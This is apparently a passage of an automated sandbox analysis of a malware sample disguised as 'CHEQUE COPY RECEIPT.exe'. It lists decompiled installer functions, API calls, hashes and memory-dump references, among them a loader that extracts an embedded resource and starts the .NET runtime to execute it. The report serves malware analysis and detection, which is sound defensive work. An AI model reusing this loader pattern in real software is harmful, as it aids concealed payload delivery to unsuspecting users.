					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nscD29E.tmp", 7);
			}

0x0040396e
0x0040397d
0x00403980
0x00403982
0x00403982
0x00403989
0x00403991
0x00403994
0x00403996
0x00403996
0x00403996
0x0040399d
0x004039af

APIs

CloseHandle.KERNEL32(0000029C,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
CloseHandle.KERNEL32(00000290,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

Strings

C:\Users\user\AppData\Local\Temp\nscD29E.tmp, xrefs: 004039A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403973

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nscD29E.tmp
API String ID: 2962429428-1586035956
Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD

Uniqueness

Uniqueness Score: -1.00%

Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}

0x004052ec
0x004052f6
0x00405312
0x00405334
0x00405337
0x0040533d
0x00405347
0x00405348
0x0040534a
0x00405350
0x00405350
0x0040535a
0x00000000
0x00405368
0x0040531f
0x00405357
0x00405357
0x00000000
0x00405357
0x0040532b
0x0040532d
0x00000000
0x0040532d
0x004052fc
0x00000000
0x00000000
0x00405303
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405317
CallWindowProcA.USER32 ref: 00405368

Part of subcall function 0040431D: SendMessageA.USER32 ref: 0040432F

Strings

, xrefs: 004052F8

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E

Uniqueness

Uniqueness Score: -1.00%

Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406142
0x00406144
0x0040615c
0x00406161
0x00406166
0x004061a3
0x004061a3
0x00406168
0x0040617a
0x00406185
0x0040618b
0x00406195
0x00000000
0x00000000
0x00406195
0x004061a8

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185

Strings

Call, xrefs: 00406137, 0040616B

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058f5
0x00405915
0x0040591d
0x00405922
0x00000000
0x00405928
0x0040592c

APIs

CreateProcessA.KERNEL32 ref: 00405915
CloseHandle.KERNEL32(?), ref: 00405922

Strings

Error launching installer, xrefs: 004058FF

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405c2d
0x00405c37
0x00405c39
0x00405c40
0x00405c48
0x00000000
0x00000000
0x00000000
0x00405c48
0x00405c4a
0x00405c4f

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,80000000,00000003), ref: 00405C32
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,80000000,00000003), ref: 00405C40

Strings

C:\Users\user\Desktop, xrefs: 00405C2C

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 73CA10E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73CA10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x73ca405c = _a8;
				 *0x73ca4060 = _a16;
				 *0x73ca4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73ca4038, E73CA1556, _t52);
				_t43 =  *0x73ca405c +  *0x73ca405c * 4 << 2;
				_t17 = E73CA123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73CA1266(E73CA12AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E73CA12D1( *_t55 - 0x30, E73CA123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73ca4030;
								 *0x73ca4030 = _t31;
								E73CA1508(_t31 + 4,  *0x73ca4064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73ca4030;
							if( *0x73ca4030 != 0) {
								E73CA1508( *0x73ca4064, _t34 + 4, _t43);
								_t37 =  *0x73ca4030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73ca4030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x73ca10e7
0x73ca10ef
0x73ca1103
0x73ca110b
0x73ca1116
0x73ca1119
0x73ca1121
0x73ca1124
0x73ca1126
0x73ca11c4
0x73ca11d0
0x73ca112c
0x73ca112d
0x73ca112d
0x73ca1130
0x73ca1131
0x73ca1134
0x73ca1203
0x73ca1206
0x73ca119e
0x73ca11a4
0x73ca11ac
0x73ca11b1
0x73ca11b4
0x00000000
0x73ca11b4
0x73ca1209
0x73ca120a
0x73ca1186
0x73ca118c
0x73ca1194
0x00000000
0x73ca1194
0x73ca1152
0x73ca1153
0x73ca115b
0x73ca1168
0x73ca1170
0x73ca1179
0x73ca117e
0x73ca117e
0x00000000
0x73ca1153
0x73ca113a
0x73ca11d1
0x73ca11d1
0x73ca11d8
0x73ca11e5
0x73ca11ea
0x73ca11ef
0x73ca11f5
0x73ca11fb
0x73ca11fb
0x00000000
0x73ca11d8
0x73ca1140
0x73ca1143
0x00000000
0x00000000
0x73ca1149
0x73ca114c
0x73ca119b
0x00000000
0x73ca119b
0x73ca114f
0x73ca1150
0x73ca1183
0x00000000
0x73ca1183
0x00000000
0x73ca11ba
0x73ca11ba
0x00000000
0x73ca11c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73CA115B
GlobalFree.KERNEL32 ref: 73CA11B4
GlobalFree.KERNEL32 ref: 73CA11C7
GlobalFree.KERNEL32 ref: 73CA11F5

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a5b3a2b32f3bb2d111bd05ba0331856236ae1fa523a13f4e221701c409469bbd
Instruction ID: 3d7164006d30957654cde601a5cd7423c0287954d65419c89819fea4cde77152
Opcode Fuzzy Hash: a5b3a2b32f3bb2d111bd05ba0331856236ae1fa523a13f4e221701c409469bbd
Instruction Fuzzy Hash: B3310AB25042969FE701EF6ED988B657FF9FB05250B294515E94ACB350DB36EC00EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d5b
0x00405d5d
0x00405d60
0x00405d8c
0x00405d65
0x00405d6e
0x00405d73
0x00405d7e
0x00405d81
0x00405d9d
0x00405d83
0x00405d8a
0x00000000
0x00405d8a
0x00405d96
0x00405d9a
0x00405d9a
0x00405d94
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 3060 Parent PID: 3888 CHEQUE COPY RECEIPT.exeCOMMON

Executed Functions

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v4.0.30319
API String ID: 2372384083-3152434051
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 0505F5F8, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7f06026de49ec07d4e13d31d2c85eaa224996956bc1a28104ce74ccee90604
Instruction ID: 69835a76960583b539c578f1aa442d38bd7f78132bf0b17a145cd480fad9ca81
Opcode Fuzzy Hash: 3d7f06026de49ec07d4e13d31d2c85eaa224996956bc1a28104ce74ccee90604
Instruction Fuzzy Hash: 9DF18F70A0020ACFDB10DFA5D948BAEBBF2FF48324F158559D805AF361DB78A945CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 022CB6C0, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 022CB730
GetCurrentThread.KERNEL32 ref: 022CB76D
GetCurrentProcess.KERNEL32 ref: 022CB7AA
GetCurrentThreadId.KERNEL32 ref: 022CB803

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 41c25162a9c80608744565fe8033f2a25e476df51a9f4cc3fdb56c573a794429
Instruction ID: 60686e68ac7ee3e9155f70a90a491f476dec7388c70eb5921e8b035938b97a98
Opcode Fuzzy Hash: 41c25162a9c80608744565fe8033f2a25e476df51a9f4cc3fdb56c573a794429
Instruction Fuzzy Hash: C95167B49046498FDB10CFA9D688BEEBBF1EF48318F2085AED409A72A0C7345945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 022CB6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 022CB730
GetCurrentThread.KERNEL32 ref: 022CB76D
GetCurrentProcess.KERNEL32 ref: 022CB7AA
GetCurrentThreadId.KERNEL32 ref: 022CB803

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d2e127d295e48be0e73032afdce8ae638f3d7ba8fdfd6744105528481c5a0335
Instruction ID: fa9e0f2f46cd86da7c56acd2946f25665fd1f29451f303fc9be569729f59a183
Opcode Fuzzy Hash: d2e127d295e48be0e73032afdce8ae638f3d7ba8fdfd6744105528481c5a0335
Instruction Fuzzy Hash: EC5136B4E006098FDB10CFA9D648BDEBBF5EB48318F20856EE419A7360D7345944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 050517E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98dbd8b05f00cd741560802108200c7e9e537022ce6ecbf4115487dd41833a5
Instruction ID: 08f9e18f72f28f5901f128d2dd1c8edb0564c2e4be410b222ee2d1a65dd353d7
Opcode Fuzzy Hash: e98dbd8b05f00cd741560802108200c7e9e537022ce6ecbf4115487dd41833a5
Instruction Fuzzy Hash: CF226F78E04206DFCB54DB98E588ABFBBB2BF89320F548555DD12A7364C734AC81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 022C93E8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bf089a3621139fbf6f05e90cae0b83662083f187371d166acfb9992bf19fa01a
Instruction ID: defad831d7c3601614e933bcf38d9cc0cd7bfb74ec23d78b657b2165a11898ee
Opcode Fuzzy Hash: bf089a3621139fbf6f05e90cae0b83662083f187371d166acfb9992bf19fa01a
Instruction Fuzzy Hash: 62714470A10B058FD724DF69C4447AABBF2BF88314F108A2DD58AD7A54DB35E849CF91

Uniqueness

Uniqueness Score: -1.00%

Function 022CFBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
